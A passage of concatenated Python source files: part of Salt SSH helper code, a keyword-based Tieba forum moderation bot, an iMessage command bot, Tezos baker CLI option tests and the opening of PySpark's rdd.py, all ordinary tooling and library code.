2: {
6: "Install Python 2.7 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.7 / Python 3 targets",
7: "Install Python 2.6 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.6 / Python 3 targets",
},
3: {
"default": "- Install Python 2.6/2.7 Salt dependencies on the Salt SSH \n"
" master to interact with Python 2.6/2.7 targets\n"
"- Install Python 3 on the target machine(s)",
},
"default": "Matching major/minor Python release (>=2.6) needed both on the Salt SSH \n"
"master and target machine",
}
major, minor = sys.version_info[:2]
help_msg = (
messages.get(major, {}).get(minor)
or messages.get(major, {}).get("default")
or messages["default"]
)
return "Python version error. Recommendation(s) follow:\n" + help_msg
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
_version_mismatch_error(),
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, six.string_types):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, six.string_types):
if comp.startswith(proto):
ret.append(comp)
return ret
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{0}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
if six.PY3:
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{0}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
version_parts = ret[1].split(b",")[0].split(b"_")[1]
parts = []
for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{0}={1}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
run.py | import tiebalib
import logging
import math
import threading
import queue
import re
import time
import itertools
import jieba
from collections import Counter
def judge_thread(thread_list):
for thread in thread_list:
thread["result"] = [0,0]
thread["reason"] = []
#------处理首页相同作者贴子情况------------------
author_counting = {}
author_list = []
for thread in thread_list[3:]:
if thread["author"] not in author_counting:
author_counting[thread["author"]] = 1
else: author_counting[thread["author"]] += 1
for author in author_counting:
if author_counting[author] >= same_author_limit[0]:
author_list.append(author)
for author in author_list:
if author != '----':#偶见作者全为‘----’,防止首页爆炸
temp_thread_list = []
for thread in thread_list:
if thread["author"] == author:
temp_thread_list.append(thread)
temp_thread_list.sort(key=lambda x:int(x["reply_num"]))
for thread in temp_thread_list[:same_author_limit[1]]:
thread["result"][0] += 1
thread["reason"].append("超过同用户发贴数限制")
else:
logger.warning("首页出现了一次抓取错误,用户名均为'----'")
#----------处理首页贴子标题撞车---------------------
filterpunct = lambda s: ''.join(filter(lambda x: x not in punct, s))
punct = set(u''':!),.:;?]}¢'"、。〉》」』】〕〗〞︰︱︳﹐、﹒
﹔﹕﹖﹗﹚﹜﹞!),.:;?|}︴︶︸︺︼︾﹀﹂﹄﹏、~¢
々‖•·ˇˉ―--′’”([{£¥'"‵〈《「『【〔〖([{£¥〝︵︷︹︻
︽︿﹁﹃﹙﹛﹝({“‘-—_… ''')
for thread_cb in itertools.combinations(thread_list,2):
(thread1,thread2) = thread_cb
text1 = filterpunct(thread1["topic"])
text2 = filterpunct(thread2["topic"])
simi_rate = calculate_similarity(text1,text2)
if simi_rate > 0.8 and same_topic_limit:
min_reply_thread = min(thread1,thread2,key = lambda p:p["reply_num"])
min_reply_thread["result"][0] += 1
min_reply_thread["reason"].append("首页标题撞车")
#-----------------------------------------------
for thread in thread_list:
for dic in keywords:
if re.search(dic["keyword"],thread["topic"]) and dic["topic"]:
if dic["delete"]:
thread["result"][0] += 1
if dic["block"]:
thread["result"][1] += 1
thread["reason"].append("关键词:"+dic["keyword"])
for dic in author_keywords:
if re.search(dic["author"],thread["author"]):
if dic["delete"]:
thread["result"][0] += 1
if dic["block"]:
thread["result"][1] += 1
thread["reason"].append("ID关键词:"+dic["author"])
return thread_list
def judge_post(post_list):
for post in post_list:
post["result"] = [0,0]
post["reason"] = []
for dic in keywords:
if re.search(dic["keyword"],post["text"]) and dic["post"]:
if dic["delete"]:
post["result"][0] += 1
if dic["block"]:
post["result"][1] += 1
post["reason"].append("关键词:"+dic["keyword"])
for dic in author_keywords:
if re.search(dic["author"],post["author"]):
if dic["delete"]:
post["result"][0] += 1
if dic["block"]:
post["result"][1] += 1
post["reason"].append("ID关键词:"+dic["author"])
if post["level"] < thread_level_limit and post["floor"] == 1:#限定主题作者等级
post["result"][0] += 1
post["reason"].append("楼主低于指定等级")
if len(post["smiley"]) > smiley_limit:
post["result"][0] += 1
post["result"][1] += 1
post["reason"].append("表情数量超出限制")
if post["author"] in whitelist:
post["result"] = [0,0]
return post_list
def judge_comment(comment_list):
try:
for comment in comment_list:
comment["result"] = [0,0]
comment["reason"] = []
for dic in keywords:
if re.search(dic["keyword"],comment["text"]) and dic["post"]:
if dic["delete"]:
comment["result"][0] += 1
if dic["block"]:
comment["result"][1] += 1
comment["reason"].append("关键词:"+dic["keyword"])
for dic in author_keywords:
if re.search(dic["author"],comment["user_name"]):
if dic["delete"]:
comment["result"][0] += 1
if dic["block"]:
comment["result"][1] += 1
comment["reason"].append("ID关键词:"+dic["author"])
if comment["user_name"] in whitelist:
comment["result"] = [0,0]
except TypeError:
logger.info("TypeError:" + str(comment))
except Exception as e:
logger.info("Error:" + str(comment) + str(e))
return comment_list
def thread_spider():
while True:
thread_list = tiebalib.get_thread_list(aim_tieba)#爬取首页贴子列表
thread_handler(thread_list)#判断首页贴子进行处理
for thread in thread_list[:once_scan_num]:
post_task_queue.put(thread)
comment_task_queue.put(thread)
time.sleep(spider_sleeptime)
def post_spider():
while True:
thread = post_task_queue.get()
post_list = tiebalib.get_post(thread["tid"],pn=9999)
posts_queue.put(post_list)
def comment_spider():
while True:
thread = comment_task_queue.get()
post_list = tiebalib.get_post(thread["tid"],pn=1)
posts_queue.put(post_list)#把第一页post也送去检查关键词
if post_list:
for post in post_list:
if post["pid"] not in comment_num:
comment_num[post["pid"]] = post["comment_num"]
if post["comment_num"]:
pn = 1
while pn <= (post["comment_num"]//10+1):
comment_list = tiebalib.get_comment(post["tid"],post["pid"],pn)
comments_queue.put(comment_list)
pn += 1
else:
if post["comment_num"] > comment_num[post["pid"]]:
pn = comment_num[post["pid"]]//10+1
while pn <= (post["comment_num"]//10+1):
comment_list = tiebalib.get_comment(post["tid"],post["pid"],pn)
comments_queue.put(comment_list)
pn += 1
comment_num[post["pid"]] = post["comment_num"]
def thread_handler(thread_list):
result_list = judge_thread(thread_list)
for thread in result_list:
if (thread["pid"] not in is_succeed) and (thread["pid"] not in is_failed):
if thread["result"][0]:
status = tiebalib.delete_thread(thread["tid"])
if status["no"] == 0:
logger.info(' '.join(thread["reason"])+" 删除主题:"+thread["topic"]+" 作者:"+thread["author"])
is_succeed.append(thread["pid"])
else:
logger.info(str(status) + " 删除主题失败 " + str(thread))
is_failed.append(thread["pid"])
if thread["result"][1]:
status = tiebalib.blockid(thread["pid"], thread["author"])
if status['errno'] == 0:
logger.info(' '.join(thread["reason"])+" 封禁主题:"+thread["topic"]+" 作者:"+thread["author"])
is_succeed.append(thread["pid"])
else:
logger.info(str(status) + " 封禁主题失败 " + str(thread))
is_failed.append(thread["pid"])
def post_handler():
while True:
post_list = posts_queue.get()
result_list = judge_post(post_list)
for post in result_list:
if (post["pid"] not in is_succeed) and (post["pid"] not in is_failed):#添加处理记录
if post["result"][0]:
if post["floor"] == 1:
status = tiebalib.delete_thread(post["tid"])
if status["no"] == 0:
logger.info(' '.join(post["reason"])+" 删除主题:"+post["text"]+" 作者:"+post["author"])
is_succeed.append(post["pid"])
else:
logger.info(str(status)+" 删除主题失败 "+str(post))
is_failed.append(post["pid"])
else:
status = tiebalib.delete_post(post["tid"], post["pid"])
if status["no"] == 0:
logger.info(' '.join(post["reason"])+" 删除回复:"+post["text"]+" 作者:"+post["author"])
is_succeed.append(post["pid"])
else:
logger.info(str(status)+" 删除回复失败 " + str(post))
is_failed.append(post["pid"])
if post["result"][1]:
status = tiebalib.blockid(post["pid"], post["author"])
if status['errno'] == 0:
logger.info(' '.join(post["reason"])+" 封禁回复:"+post["text"]+" 作者:"+post["author"])
is_succeed.append(post["pid"])
else:
logger.info(str(status)+" 封禁回复失败 "+str(post))
is_failed.append(post["pid"])
def comment_handler():
while True:
comment_list = comments_queue.get()
result_list = judge_comment(comment_list)
for comment in result_list:
if comment["result"][0]:
status = tiebalib.delete_comment(comment["tid"], comment["spid"])
if status["no"] == 0:
comment_num[comment["pid"]] -= 1
logger.info(' '.join(comment["reason"])+" 删除楼中楼:"+comment["text"]+" 作者:"+comment["user_name"])
else:
logger.info(str(status)+" 删除楼中楼失败 "+str(comment))
if comment["result"][1]:
status = tiebalib.blockid(comment["pid"], comment["user_name"])
if status['errno'] == 0:
logger.info(' '.join(comment["reason"])+" 封禁楼中楼:"+comment["text"]+" 作者:"+comment["user_name"])
else:
logger.info(str(status)+" 封禁楼中楼失败 "+str(comment))
def calculate_similarity(text1,text2):
raw1 = jieba.cut(text1)
raw2 = jieba.cut(text2)
raw1 = Counter(raw1)
raw2 = Counter(raw2)
same_words = set(raw1) & set(raw2)
if (math.sqrt(len(raw1)) * math.sqrt(len(raw2))) != 0:
dot_product = 0
mod1 = 0
mod2 = 0
for word in same_words:
dot_product += raw1[word] * raw2[word]
for word in raw1:
mod1 += math.pow(raw1[word],2)
for word in raw2:
mod2 += math.pow(raw2[word],2)
cos = dot_product/math.sqrt(mod1*mod2)
else:
cos = 0
return cos
from config import *
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s","%Y-%m-%d %H:%M:%S")
fh = logging.FileHandler('operate.log')
fh.setFormatter(formatter)
fh.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# 使用帐号密码登陆获取到cookie
if enable_login_model:
import tiebalib.login_model
cookie_for_selenium = tiebalib.login_model.get_cookie_by_selenium(username, password)
if tiebalib.login_model.try_cookie_logined(cookie_for_selenium):
cookie = cookie_for_selenium
print(cookie)
else:
logger.warning("通过selenium获取cookie失败,将使用config中的cookie")
tiebalib.initialize(aim_tieba,cookie)
logger.info("初始化完成")
comment_num = {}#用来储存pid对应楼中楼层数
is_failed = []#储存一个post是否删除失败过
is_succeed = []#储存一个post是否删除成功过
#以上dict均以贴子pid作为key值
work_thread_list = []
post_task_queue = queue.Queue()
comment_task_queue = queue.Queue()
posts_queue = queue.Queue()
comments_queue = queue.Queue()
#爬首页线程
ts = threading.Thread(target=thread_spider,args=(),name="thread_spider")
work_thread_list.append(ts)
#爬贴子线程
for i in range(threading_num):
ps = threading.Thread(target=post_spider,args=(),name="post_spider")
work_thread_list.append(ps)
#爬第一页楼中楼线程
for i in range(threading_num):
cs = threading.Thread(target=comment_spider,args=(),name="comment_spider")
work_thread_list.append(cs)
#楼中楼处理线程
ph = threading.Thread(target=post_handler,args=(),name="post_handler")
ch = threading.Thread(target=comment_handler,args=(),name="comment_handler")
work_thread_list.append(ph)
work_thread_list.append(ch)
#启动全部工作线程
for work_thread in work_thread_list:
work_thread.start()
while True:
#更新关键词信息
from keywords import *
from author_keywords import *
from whitelist import *
#重启退出进程
for index, work_thread in enumerate(work_thread_list):
if not work_thread.isAlive():
new_thread = threading.Thread(target=locals()[work_thread.name],args=(),name=work_thread.name)
work_thread_list[index] = new_thread
new_thread.start()
time.sleep(2)
|
Bot.py | from threading import Thread
import sqlite3
from time import sleep
import subprocess
from inspect import signature
from inspect import getmembers
from inspect import ismethod
from importlib import import_module
from .Message import Message, MessageSent
from .User import User
from .Image import Image
from .Errors import *
class bot():
"""[summary]
Returns:
[type]: [description]
"""
DebugMode = False
def __init__(self, prefixes):
"""[summary]
"""
if prefixes != None and prefixes != []:
if isinstance(prefixes, list):
self.prefixes = prefixes
else:
self.prefixes = list(prefixes)
else:
raise InvalidPrefixes(f"Prefixes: {prefixes} are not valid")
self.extensions = []
self.extensionCommands = {}
self._running = False
self.queue = []
self.database = "/Users/User/Library/Messages/chat.db"
self.DefaultChat = ''
def import_extension(self, extensionName):
"""[summary]
Args:
extensionName ([type]): [description]
"""
temp = import_module(extensionName)
temp.setup(self)
return
def add_extension(self, extension):
"""[summary]
Args:
extension ([type]): [description]
"""
def get_methods(obj):
"""[summary]
Args:
obj ([type]): [description]
Returns:
[type]: [description]
"""
ls = []
for i in range(len(getmembers(obj, predicate=ismethod))):
if getmembers(obj, predicate=ismethod)[i][0] != '__init__':
ls.append(getmembers(obj, predicate=ismethod)[i][0])
return ls
try:
self.extensions.append(extension)
try :
i = max(self.extensionCommands.keys())
i += 1
self.extensionCommands[i] = {'Name':type(self.extensions[i]).__name__, 'Commands':get_methods(self.extensions[i])}
except:
self.extensionCommands[0] = {'Name':type(self.extensions[0]).__name__, 'Commands':get_methods(self.extensions[0])}
return
except:
print(f"Extension {extension} could not be loaded")
return
def run_command(self, message):
"""[summary]
Args:
message ([type]): [description]
Returns:
[type]: [description]
"""
if message.Text[0] in self.prefixes:
text = message.Text[1:].split()
command = text.pop(0)
argdict = {}
run = None
for i in self.extensionCommands:
for j in self.extensionCommands[i]['Commands']:
if command.lower() == j.lower():
run = getattr(self.extensions[i],j)
break
if run == None:
print(f"Command {command} could not be found")
return
else:
if len(signature(run).parameters) != 0:
for i in range(len(signature(run).parameters)):
if list(signature(run).parameters.keys())[i] == 'ctx':
argdict[f'arg{i}'] = 'ctx' #getctx()
elif i == (len(signature(run).parameters) - 1) and len(text) > 1:
lastargument = ' '.join(text)
argdict[f'arg{i}'] = lastargument
elif len(text) > 0:
argdict[f'arg{i}'] = text.pop(0)
else:
print(f"ERROR: Not Enough Arguments for function: {command}")
return NotEnoughArgs
run(*argdict.values())
return
else:
run()
return
else:
print(f"Passed invalid message: {message}")
return
def sendMessage(self, Chat, Message):
"""[summary]
Args:
Chat ([type]): [description]
Message ([type]): [description]
Returns:
[type]: [description]
"""
if bot.DebugMode != True:
subprocess.run(["osascript","./iMessage/sendMessage.scpt",Chat,Message])
return MessageSent
else:
print(f"Message: '{Message}' sent to Chat:{Chat}")
return
def getData(self):
"""[summary]
"""
conn = sqlite3.connect(self.database)
c = conn.cursor()
rowId = c.execute("SELECT * FROM message ORDER BY ROWID DESC LIMIT 1;").fetchone()[0]
#currentMessage = Message(rowId)
#self.queue.append(currentMessage)
conn.close()
while self._running == True:
conn = sqlite3.connect(self.database)
c = conn.cursor()
currentMessage = Message(rowId)
if currentMessage.FullMessage != None:
rowId += 1
print(f"Now Processing Row: {rowId}", end="\r")
self.queue.append(currentMessage)
conn.close()
sleep(0.2)
def processData(self):
"""[summary]
"""
while self._running == True:
if len(self.queue) != 0:
temp = self.queue.pop(0)
if temp.Text != None:
if temp.Text[0] in self.prefixes:
self.run_command(temp)
temp.storeData()
sleep(0.5)
def start(self):
"""[summary]
"""
if self._running == True:
print("The Bot is already running")
return
else:
self._running = True
self.t1 = Thread(target = self.getData)
self.t2 = Thread(target = self.processData)
self.t1.start()
self.t2.start()
return
def stop(self):
"""[summary]
"""
self._running = False
self.t1.join()
self.t2.join()
return
def restart(self):
"""[summary]
"""
self.stop()
self.start()
return |
test_baker_operations_cli_options.py | """Simple tests to check support for the following operations-related options
for baking
- --ignore-node-mempool
- --operations-pool [file|uri]
"""
import os
import os.path
import json
import time
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from typing import List, Any
import pytest
from client.client import Client
from tools import constants, utils
from launchers.sandbox import Sandbox
from . import protocol
PORT = 12121
OPERATIONS_FILES_DIRECTORY = "operations_files"
EMPTY_OPERATIONS = "empty_operations"
ABSENT_OPERATIONS = "this_file_should_not_exist"
SINGLETON_OPERATIONS = "singleton_operations"
TEST_DIR = "tests_alpha"
class MyHttpServer:
"""Simple HTTP server launching in a separate process"""
def __init__(self):
server_address = ('localhost', PORT)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
process = Process(target=httpd.serve_forever, args=())
self.process = process
self.server = httpd
def run(self):
self.process.start()
def close(self):
self.server.server_close()
self.process.terminate()
@pytest.fixture
def http_server():
server = MyHttpServer()
server.run()
yield server
server.close()
def get_filename(basename: str) -> str:
return os.path.join(
TEST_DIR, OPERATIONS_FILES_DIRECTORY, f"{basename}.json"
)
class TestIgnoreNodeMempool:
def test_ignore(self, client: Client):
"""Check that a transfer injected into the node is dutifully ignored
when baking with --ignore-node-mempool
"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
client.transfer(2, sender, 'bootstrap5')
utils.bake(
client, bake_args=['--minimal-timestamp', "--ignore-node-mempool"]
)
balance1 = client.get_balance(sender)
# Make sure the operations has not been included, indirectly through
# balance checks
assert balance1 == balance0
assert client.get_level() == 2
def test_no_ignore(self, client: Client):
"""Check that a transfer injected, then ignored, can be injected at the
next block"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_balance(sender)
assert balance1 != balance0
assert client.get_level() == 3
def all_empty(lls: List[List[Any]]) -> bool:
return all(map(lambda l: len(l) == 0, lls))
def only_has_endorsements(lls: List[List[Any]]) -> bool:
return all(map(lambda x: x[0] == 0 or len(x[1]) == 0, enumerate(lls)))
def mempool_to_operations(mempool):
def to_op(applied_op):
operation = {}
operation['branch'] = applied_op['branch']
operation['contents'] = applied_op['contents']
operation['signature'] = applied_op['signature']
return operation
return [to_op(applied_op) for applied_op in mempool['applied']]
def get_operations(client: Client) -> List[dict]:
return mempool_to_operations(client.get_mempool())
class TestExternalOperations:
def test_bake_empty_operations_file(self, client: Client):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
get_filename(EMPTY_OPERATIONS),
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert all_empty(head['operations'])
# http_server is a fixture that auto- runs and closes said HTTP server
# pylint: disable=W0613
def test_bake_empty_operations_http(self, client: Client, http_server):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{get_filename(EMPTY_OPERATIONS)}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_absent_operations_file(self, client: Client):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
# pylint: disable=W0613
def test_bake_absent_operations_http(self, client: Client, http_server):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
# any fake URL would do here
f"http://localhost:{PORT}/{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_singleton_operations_file_pre(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, and bake it.
Store it into the context to serves as a dynamic oracle for the next
steps.
"""
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
session['amount'] = 2
client.transfer(session['amount'], sender, 'bootstrap3')
# Baking
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_mutez_balance(sender)
session['difference'] = balance0 - balance1
assert session['difference'] >= session['amount']
utils.bake(client)
def test_bake_singleton_operations_file(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, put it into a file,
and bake it into the chain through --operations-pool option.
This additionally compares the balance to a normal transfer (through the
node's mempool) to check that there is no observable difference in
behaviors between passing through a node's mempool or a hand-rolled
operations file.
"""
sender = 'bootstrap4'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
# Baking
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
file,
'--ignore-node-mempool',
],
)
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# pylint: disable=W0613
def test_bake_singleton_operations_http(
self, client: Client, sandbox: Sandbox, session: dict, http_server
):
# Restart
sandbox.node(0).terminate()
time.sleep(3)
sandbox.node(0).run()
client.check_node_listening()
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{file}",
'--ignore-node-mempool',
],
)
sandbox.client(0).rpc('get', '/chains/main/blocks/head')
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# The 5 bootstrap accounts
ALL_BOOTSTRAP_ACCOUNTS = [f'bootstrap{i + 1}' for i in range(5)]
@pytest.mark.incremental
class TestBakerExternalOperations:
"""Test adding an external operations source (file) {}to a baker daemon"""
def test_init(self, sandbox: Sandbox):
sandbox.add_node(0, params=constants.NODE_PARAMS)
parameters = protocol.get_parameters()
parameters['minimal_block_delay'] = "1"
parameters["delay_increment_per_round"] = "1"
protocol.activate(
sandbox.client(0),
parameters=parameters,
activate_in_the_past=False,
)
def test_gen_operations(self, sandbox: Sandbox, session: dict):
"""Generate a transfer operation and save it to a file"""
client = sandbox.client(0)
client.multibake(args=['--minimal-timestamp'])
client.transfer(3, 'bootstrap1', 'bootstrap3')
client.multibake(args=['--minimal-timestamp'])
client.multibake(args=['--minimal-timestamp'])
# We are now at level 2, next block at level 4
level = client.get_level()
session['level'] = level
assert level == 4
assert len(get_operations(client)) == 0
time.sleep(3)
session['transfer_value'] = 2
client.transfer(session['transfer_value'], 'bootstrap1', 'bootstrap3')
pending_ops = get_operations(client)
# Write the transaction to a file
filename = get_filename(SINGLETON_OPERATIONS)
session['operations_file'] = filename
with open(filename, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
def test_terminate_sandbox(self, sandbox: Sandbox):
"""Cleanup the node's mempool. Forget about the last transfer"""
sandbox.node(0).terminate()
# let the node end gracefully before restarting
time.sleep(1)
def test_baker(self, sandbox: Sandbox, session: dict):
"""Restart the node and add a baker daemon"""
sandbox.node(0).run()
assert sandbox.client(0).check_node_listening()
assert os.path.isfile(session['operations_file'])
sandbox.add_baker(
0,
ALL_BOOTSTRAP_ACCOUNTS,
proto=protocol.DAEMON,
log_levels=constants.TENDERBAKE_BAKER_LOG_LEVELS,
run_params=[
'--operations-pool',
session['operations_file'],
'--liquidity-baking-toggle-vote',
'pass',
],
)
@pytest.mark.timeout(30)
def test_wait_until_high_enough_level(
self, sandbox: Sandbox, session: dict
):
"""Wait until we have seen enough blocks.
This should not take much time."""
while sandbox.client(0).get_level() < 2 * session['level']:
time.sleep(1)
def test_check_block_baked(self, sandbox: Sandbox, session: dict):
"""Check that block exactly contains the operations that we put into
our operations file"""
expected_level = session['level']
block = sandbox.client(0).rpc(
'get', f'/chains/main/blocks/{expected_level}'
)
manager_ops = block['operations'][3]
assert len(manager_ops) == 1
assert int(
manager_ops[0]['contents'][0]['amount']
) == utils.mutez_of_tez(session['transfer_value'])
def test_check_block_after_baked(self, sandbox: Sandbox, session: dict):
"""Check that block is empty of operations"""
level = session['level'] + 1
block = sandbox.client(0).rpc('get', f'/chains/main/blocks/{level}')
assert only_has_endorsements(block['operations'])
# cleanup the operation file
os.remove(session['operations_file'])
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import do_server_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
